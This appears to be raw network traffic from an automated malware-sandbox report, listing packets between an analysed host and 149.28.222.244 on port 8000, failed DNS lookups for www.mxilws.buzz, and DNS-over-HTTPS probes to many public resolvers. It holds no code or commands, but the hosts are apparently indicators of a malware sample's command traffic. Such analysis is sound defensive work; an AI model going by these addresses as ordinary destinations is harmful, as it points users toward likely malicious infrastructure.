                                                                                                                            Mar 12, 2024 16:32:02.308984995 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309041023 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309055090 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309086084 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309174061 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309216022 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309216976 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309257984 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309261084 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309326887 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309353113 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309362888 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309366941 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309380054 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309407949 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309422016 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309695005 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309716940 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309731007 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309737921 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309762955 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309767008 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309788942 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309809923 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309830904 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309844971 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309887886 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309892893 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309906960 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.309935093 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309950113 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.309973955 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310017109 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310023069 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310046911 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310070992 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310086012 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310710907 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310760021 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310775995 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310808897 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310816050 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310842037 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310852051 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310884953 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310930014 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310942888 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310972929 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310981989 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.310982943 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.310997963 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311008930 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311021090 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311026096 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311047077 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311062098 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311069965 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311105967 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311505079 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311547041 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311547995 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311562061 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311583042 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311590910 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311595917 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311602116 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311609983 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311621904 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311621904 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311634064 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311650991 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311655998 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311671019 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311692953 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311701059 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311737061 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311763048 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311815023 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.311839104 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.311881065 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313000917 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313050985 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313076973 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313123941 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313160896 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313180923 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313204050 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313211918 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313218117 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313251972 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313276052 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313318968 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313332081 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313344002 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313355923 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313369036 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313376904 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313390017 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313396931 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313419104 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313431978 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313796043 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313808918 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313819885 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313832998 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313842058 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313844919 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313858032 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.313865900 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313879967 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.313906908 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314127922 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314141035 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314177036 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314201117 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314203978 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314218044 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314240932 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314248085 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314260006 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314260960 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314275026 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314286947 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314292908 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314313889 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314335108 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314343929 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314357042 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314385891 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314399958 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314431906 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314444065 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.314472914 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.314487934 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315340042 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315377951 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315383911 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315398932 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315419912 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315423012 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315439939 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315448999 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315468073 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315485001 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315501928 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315545082 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315576077 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315617085 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315675974 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315696001 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315725088 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315727949 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315743923 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315769911 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315785885 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315819979 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315898895 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315911055 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.315943003 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.315958023 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316003084 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316015005 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316026926 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316037893 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316040993 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316050053 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316056967 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316071033 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316083908 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316104889 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316119909 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316162109 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316164017 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316196918 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316225052 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316237926 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316262007 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316267014 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316297054 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:02.316308975 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316323996 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:02.316333055 CET497058000192.168.2.5149.28.222.244

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Mar 12, 2024 16:32:02.075563908 CET192.168.2.51.1.1.10xa23cStandard query (0)www.mxilws.buzzA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:06.941765070 CET192.168.2.51.1.1.10x6584Standard query (0)www.mxilws.buzzA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:12.020020008 CET192.168.2.51.1.1.10xef8aStandard query (0)www.mxilws.buzzA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:17.378216982 CET192.168.2.51.1.1.10x3c19Standard query (0)www.mxilws.buzzA (IP address)IN (0x0001)false
                                                                                                                            2024-03-12 15:32:41 UTC192.168.2.59.9.9.100xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:32:42 UTC192.168.2.59.9.9.100xcafeStandard query (0)ecvfcdsyejuovapu.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:43 UTC192.168.2.5101.101.101.1010xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:32:45 UTC192.168.2.5101.101.101.1010xcafeStandard query (0)wttxkeqiublzfbuk.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:47 UTC192.168.2.5172.64.134.390xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:32:48 UTC192.168.2.5172.64.134.390xcafeStandard query (0)rswqoikbsmpyvqzb.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:48 UTC192.168.2.595.179.131.820xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:32:49 UTC192.168.2.595.179.131.820xcafeStandard query (0)xoodjwtrxuhqrdmy.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:58 UTC192.168.2.591.107.235.00xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:32:59 UTC192.168.2.591.107.235.00xcafeStandard query (0)mcnbjggvtqykmrmm.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:00 UTC192.168.2.5213.196.191.960xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:01 UTC192.168.2.5213.196.191.960xcafeStandard query (0)aylnalepiqttafwj.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:03 UTC192.168.2.545.153.187.960xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:04 UTC192.168.2.545.153.187.960xcafeStandard query (0)osjuvyiozchfdhzu.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:05 UTC192.168.2.580.67.169.120xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:06 UTC192.168.2.580.67.169.120xcafeStandard query (0)hemcxhvmjmsyrmhj.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:06 UTC192.168.2.5116.202.176.260xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:07 UTC192.168.2.5116.202.176.260xcafeStandard query (0)rjwdtpqwqloqrvxg.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:09 UTC192.168.2.591.239.100.1000xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:11 UTC192.168.2.591.239.100.1000xcafeStandard query (0)xztkcmlcydhxptoa.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:22 UTC192.168.2.5212.126.59.630xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:23 UTC192.168.2.5212.126.59.630xcafeStandard query (0)grkhaqesqkpwfbzj.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:35 UTC192.168.2.5185.194.94.710xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:36 UTC192.168.2.5185.194.94.710xcafeStandard query (0)lfiovsnzjswbcjxl.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:37 UTC192.168.2.5207.246.87.960xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:49 UTC192.168.2.545.90.30.00xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:49 UTC192.168.2.545.90.30.00xcafeStandard query (0)oqpgvpsfvcymxcwe.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:51 UTC192.168.2.5104.21.6.780xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:53 UTC192.168.2.594.140.14.1400xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:33:53 UTC192.168.2.594.140.14.1400xcafeStandard query (0)cthvfbxnofkmrcdd.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:11 UTC192.168.2.5149.28.101.1190xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:12 UTC192.168.2.589.233.43.710xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:13 UTC192.168.2.589.233.43.710xcafeStandard query (0)slgbjnlbgjenrrqf.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:20 UTC192.168.2.59.9.9.120xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:21 UTC192.168.2.59.9.9.120xcafeStandard query (0)kebynwagdqnulxdh.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:21 UTC192.168.2.51.0.0.10xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:22 UTC192.168.2.51.0.0.10xcafeStandard query (0)zhhxulpbjunysdxu.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:23 UTC192.168.2.5172.104.93.800xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:24 UTC192.168.2.5172.104.93.800xcafeStandard query (0)avczmdgfxudkmncz.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:27 UTC192.168.2.5103.87.68.1940xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:28 UTC192.168.2.5103.87.68.1940xcafeStandard query (0)tbpbvxvlvcmlgnba.test.dnscryptNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:44 UTC192.168.2.589.38.131.380xcafeStandard query (0)512256true
                                                                                                                            2024-03-12 15:34:51 UTC192.168.2.595.215.19.530xcafeStandard query (0)512256true

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Mar 12, 2024 16:32:02.174201012 CET1.1.1.1192.168.2.50xa23cName error (3)www.mxilws.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:07.038526058 CET1.1.1.1192.168.2.50x6584Name error (3)www.mxilws.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:12.117469072 CET1.1.1.1192.168.2.50xef8aName error (3)www.mxilws.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                            Mar 12, 2024 16:32:17.475064039 CET1.1.1.1192.168.2.50x3c19Name error (3)www.mxilws.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                            2024-03-12 15:32:41 UTC9.9.9.10192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:32:42 UTC9.9.9.10192.168.2.50xcafeName error (3)ecvfcdsyejuovapu.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:45 UTC101.101.101.101192.168.2.50xcafeName error (3)wttxkeqiublzfbuk.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:47 UTC172.64.134.39192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:32:48 UTC172.64.134.39192.168.2.50xcafeName error (3)rswqoikbsmpyvqzb.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:49 UTC95.179.131.82192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:32:49 UTC95.179.131.82192.168.2.50xcafeName error (3)xoodjwtrxuhqrdmy.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:32:59 UTC91.107.235.0192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:32:59 UTC91.107.235.0192.168.2.50xcafeName error (3)mcnbjggvtqykmrmm.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:01 UTC213.196.191.96192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:02 UTC213.196.191.96192.168.2.50xcafeName error (3)aylnalepiqttafwj.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:03 UTC45.153.187.96192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:04 UTC45.153.187.96192.168.2.50xcafeName error (3)osjuvyiozchfdhzu.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:05 UTC80.67.169.12192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:06 UTC80.67.169.12192.168.2.50xcafeName error (3)hemcxhvmjmsyrmhj.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:07 UTC116.202.176.26192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:08 UTC116.202.176.26192.168.2.50xcafeName error (3)rjwdtpqwqloqrvxg.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:11 UTC91.239.100.100192.168.2.50xcafeName error (3)xztkcmlcydhxptoa.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:23 UTC212.126.59.63192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:23 UTC212.126.59.63192.168.2.50xcafeName error (3)grkhaqesqkpwfbzj.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:36 UTC185.194.94.71192.168.2.50xcafeName error (3)lfiovsnzjswbcjxl.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:49 UTC45.90.30.0192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:49 UTC45.90.30.0192.168.2.50xcafeName error (3)oqpgvpsfvcymxcwe.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:33:53 UTC94.140.14.140192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:33:53 UTC94.140.14.140192.168.2.50xcafeName error (3)cthvfbxnofkmrcdd.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:13 UTC89.233.43.71192.168.2.50xcafeName error (3)slgbjnlbgjenrrqf.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:21 UTC9.9.9.12192.168.2.50xcafeName error (3)kebynwagdqnulxdh.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:21 UTC1.0.0.1192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:34:22 UTC1.0.0.1192.168.2.50xcafeName error (3)zhhxulpbjunysdxu.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:24 UTC172.104.93.80192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:34:25 UTC172.104.93.80192.168.2.50xcafeName error (3)avczmdgfxudkmncz.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:27 UTC103.87.68.194192.168.2.50xcafeNo error (0)512256true
                                                                                                                            2024-03-12 15:34:29 UTC103.87.68.194192.168.2.50xcafeName error (3)tbpbvxvlvcmlgnba.test.dnscryptnonenoneNS (Name server)IN (0x0001)true
                                                                                                                            2024-03-12 15:34:45 UTC89.38.131.38192.168.2.50xcafeNo error (0)512256true

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
